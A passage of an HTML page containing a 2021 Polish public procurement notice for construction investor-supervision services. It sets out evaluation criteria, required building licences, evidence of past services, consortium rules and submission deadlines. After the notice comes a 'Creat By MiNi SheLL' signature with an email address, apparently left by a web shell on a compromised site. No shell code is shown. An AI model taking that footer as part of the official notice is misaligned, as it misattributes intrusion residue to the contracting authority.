trzecich, zapewnienie funkcjonalności oraz zapewnienie bezpieczeństwa użytkowników, konieczność zwiększenia zakresu usług,<br/><br/>- szacunkowa wartość tego zamówienia: 2 404,17 zł netto</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">według przyjętych kryteriów</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">kwalifikacje zawodowe i doswiadczenie osoby wyznaczonej do realizacji zamówienia mającej znaczny wpływ na jakość wykonania zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> .4. Zdolność techniczna lub zawodowa:<br/> <br/> 3.4.1. w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia <br/> działalności krótszy w tym okresie wykonał: <br/><br/>Część 1<br/>- co najmniej jedną usługę polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego wraz z kontrolowaniem rozliczeń budowy lub inżyniera kontraktu lub inwestora zastępczego, o wartości usługi nie mniejszej niż 20 000,00 zł brutto, <br/><br/>Część 2<br/>- co najmniej jedną usługę polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego wraz z kontrolowaniem rozliczeń budowy lub inżyniera kontraktu lub inwestora zastępczego, o wartości usługi nie mniejszej niż 8 000,00 zł brutto.<br/><br/>W przypadku, gdy wykonawca będzie składał ofertę na dwie części warunki sumują się. Wykonawca musi wykazać się co najmniej jedną usługą polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego wraz z kontrolowaniem rozliczeń budowy lub inżyniera kontraktu lub inwestora zastępczego, o wartości usługi nie mniejszej niż 28 000,00 zł brutto.<br/><br/> 3.4.2 dysponuje lub będzie dysponował:<br/><br/> Część 1<br/> - co najmniej jedną osobą posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności inżynieryjnej drogowej;<br/> - co najmniej jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, <br/> gazowych, wodociągowych i kanalizacyjnych;<br/> - co najmniej jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych <br/> i elektroenergetycznych;<br/><br/> lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących <br/> przepisów prawa. Zamawiający dopuszcza łączenia ww funkcji.<br/><br/> Część 2<br/> - co najmniej jedną osobą posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności inżynieryjnej drogowej;<br/> - co najmniej jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, <br/> gazowych, wodociągowych i kanalizacyjnych;<br/> - co najmniej jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych <br/> i elektroenergetycznych;<br/><br/> lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących <br/> przepisów prawa. Zamawiający dopuszcza łączenia ww funkcji.<br/><br/> W przypadku, gdy wykonawca będzie składał ofertę na dwie części warunki sumują się. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Wykonawca, którego oferta zostanie najwyżej oceniona, w celu wykazania braku podstaw (przesłanek) wykluczenia z postępowania, na podstawie art. 274 ust. 1 ustawy zostanie wezwany do złożenia następujących podmiotowych środków dowodowych (aktualnych na dzień ich złożenia):<br/><br/>- oświadczenia Wykonawcy, w zakresie art. 108 ust. 1 pkt 5 ustawy, o braku przynależności do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2020 r. poz. 1076 i 1086), z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do tej samej grupy kapitałowej.<br/>W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie w zakresie pkt 4.1 składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykaz usług.Część 1 - co najmniej jedną usługę polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego wraz z kontrolowaniem rozliczeń budowy lub inżyniera kontraktu lub inwestora zastępczego, o wartości usługi nie mniejszej niż 20 000,00 zł brutto, wykonaną, a w przypadku świadczeń okresowych lub ciągłych również wykonywaną, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.Część 2<br/>- co najmniej jedną usługę polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego wraz z kontrolowaniem rozliczeń budowy lub inżyniera kontraktu lub inwestora zastępczego, o wartości usługi nie mniejszej niż 8 000,00 zł, wykonaną, a w przypadku świadczeń okresowych lub ciągłych również wykonywaną, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane lub są wykonywane oraz załączeniem dowodów określających, czy te usługi zostały wykonane lub są wykonywane należycie.Uwaga: Dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego usługi zostały wykonane, a w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – oświadczenie Wykonawcy, w przypadku świadczeń powtarzających się lub ciągłych są wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest wstanie uzyskać tych dokumentów - oświadczenie wykonawcy; w przypadku świadczeń powtarzających się lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wystawione w okresie ostatnich 3 miesięcy. Okres, o którym wyżej mowa liczy się wstecz od dnia, w którym upływa termin składania ofert.W przypadku, gdy wykonawca będzie składał ofertę na dwie części warunki sumują się. Wykonawca musi wykazać się co najmniej jedną usługą polegającą na pełnieniu funkcji inspektora nadzoru inwestorskiego wraz z kontrolowaniem rozliczeń budowy lub inżyniera kontraktu lub inwestora zastępczego, o wartości usługi nie mniejszej niż 28 000,00 zł brutto.<br/>-w celu wykazania spełniania warunku z ust. 3.4.2.Wykaz osób .Część 1 i część 2 (dla każdej z części)<br/>- co najmniej jedną osobą posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności inżynieryjnej drogowej;<br/>- co najmniej jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/>w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, <br/>gazowych, wodociągowych i kanalizacyjnych;<br/> - co najmniej jedna osoba posiadająca uprawnienia budowlane do kierowania robotami budowlanymi <br/> w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych;<br/>lub odpowiadające im uprawnienia budowlane wydane na podstawie wcześniej obowiązujących przepisów prawa, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami.<br/>Zamawiający dopuszcza łączenia ww funkcji.<br/>W przypadku, gdy wykonawca będzie składał ofertę na dwie części warunki sumują się.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów:<br/>1)złożenie dokumentu pełnomocnictwa dla osoby zawierającej umowę w imieniu Wykonawcy, o<br/>ile upoważnienie do reprezentowania Wykonawcy nie wynika z dokumentów rejestrowych<br/>Wykonawcy, jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych<br/>baz danych, lub dokument pełnomocnictwa nie został wcześniej złożony w trakcie postępowania<br/>o udzielenie zamówienia,<br/>2) w przypadku dokonania wyboru najkorzystniejszej oferty złożonej przez Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia, złożenia umowy regulującej współpracę<br/>tych podmiotów (np. umowa konsorcjum, umowa spółki cywilnej). <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia.<br/>2. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, ustanawiają pełnomocnika do<br/>reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w<br/>Ogłoszenie nr 2021/BZP 00176498/01 z dnia 2021-09-10<br/>2021-09-10 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>postępowaniu i zawarcia umowy w sprawie zamówienia publicznego – nie dotyczy spółki<br/>cywilnej, o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, zobowiązani się złożyć wraz z<br/>ofertą stosowne pełnomocnictwo – zgodnie z ust. 3.3. rozdz. 12 SWZ – nie dotyczy spółki<br/>cywilnej o ile upoważnienie/pełnomocnictwo do występowania w imieniu tej spółki wynika z<br/>dołączonej do oferty umowy spółki bądź wszyscy wspólnicy podpiszą ofertę.<br/>Uwaga nr 1: Pełnomocnictwo, o którym mowa powyżej może wynikać albo z dokumentu pod<br/>taką samą nazwą, albo z umowy Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia.<br/>4. Oferta musi być podpisana w taki sposób, by prawnie zobowiązywała wszystkich<br/>Wykonawców występujących wspólnie (przez każdego z Wykonawców lub upoważnionego<br/>pełnomocnika).<br/>5. W przypadku wspólnego ubiegania się o udzielenie zamówienie przez Wykonawców<br/>oświadczenie, o którym mowa w art. 125 ustawy (ust. 3.1. rozdziału 12 SWZ) składa każdy z<br/>Wykonawców wspólnie ubiegających się o zamówienie. Oświadczenia te potwierdzają<br/>spełnianie warunków udziału w postępowaniu w zakresie, w którym Wykonawca wspólnie<br/>ubiegający się o udzielenie zamówienia wykazuje spełnianie warunków udziału w postępowaniu,<br/>oraz brak podstaw wykluczenia - każdy z Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia nie może podlegać wykluczeniu z postępowania w oparciu o wskazane w SWZ<br/>podstawy wykluczenia. Powyższe oznacza, iż:<br/>5.1. Oświadczenie w zakresie braku podstaw wykluczenia musi złożyć każdy z Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia;<br/>5.2. Oświadczenie o spełnianiu warunków udziału składa podmiot, który w odniesieniu do<br/>danego warunku udziału w postępowaniu potwierdza jego spełnianie; dopuszcza się<br/>oświadczenie złożone łącznie, tj. podpisane przez wszystkie podmioty wspólnie składające<br/>ofertę lub przez pełnomocnika występującego w imieniu wszystkich podmiotów.<br/>6. Wszelka korespondencja prowadzona będzie wyłącznie z podmiotem występującym jako<br/>pełnomocnik Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający na mocy art. 455 ust. 1 pkt 1 u.p.z.p. dopuszcza istotne zmiany postanowień<br/>zawartej umowy w stosunku do treści Oferty, złożonej w przedmiotowym postępowaniu bez<br/>przeprowadzania nowego postępowania o udzielenie zamówienia. Zamawiający dopuszcza<br/>także zmianę umowy bez przeprowadzenia nowego postępowania o udzielenie zamówienia w<br/>przypadkach opisanych w treści art. 455 ust. 1 pkt 2, 3 i 4 oraz ust. 2, 3 i 4 u.p.z.p.<br/>Pełny zakres zmian opisano w paragrafie 14 projektu umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-09-30 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://josephine.proebiz.com/pl/</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-09-30 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-10-29</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com